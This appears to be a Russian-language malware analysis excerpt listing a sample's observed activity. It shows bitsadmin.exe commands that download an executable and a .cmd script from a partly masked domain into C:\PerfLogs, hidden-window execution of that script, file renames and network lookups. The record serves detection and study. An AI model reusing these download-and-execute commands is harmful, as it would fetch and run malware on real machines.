Техническая информация
- '<SYSTEM32>\bitsadmin.exe' /transfer hackingarticles https://www.cj##nt.com/doc/21_05/KECqGZsc883_dControl.oui C:\PerfLogs\dControl2.exe
- '<SYSTEM32>\bitsadmin.exe' /transfer hackingarticles https://www.cj##nt.com/doc/21_06/KFhgFLoN07h_protect.cmd C:\PerfLogs\protect.cmd
- '<SYSTEM32>\cmd.exe' C:\PerfLogs\protect.cmd
- C:\perflogs\bit8f06.tmp
- C:\perflogs\bit8ee6.tmp
- C:\perflogs\bit8f06.tmp
- C:\perflogs\bit8ee6.tmp
- C:\perflogs\bit8f06.tmp в C:\perflogs\protect.cmd
- C:\perflogs\bit8ee6.tmp в C:\perflogs\dcontrol2.exe
- 'cj##nt.com':443
- 'cj##nt.com':443
- DNS ASK cj##nt.com
- '<SYSTEM32>\bitsadmin.exe' /transfer hackingarticles https://www.cj##nt.com/doc/21_05/KECqGZsc883_dControl.oui C:\PerfLogs\dControl2.exe' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer hackingarticles https://www.cj##nt.com/doc/21_06/KFhgFLoN07h_protect.cmd C:\PerfLogs\protect.cmd' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' C:\PerfLogs\protect.cmd' (со скрытым окном)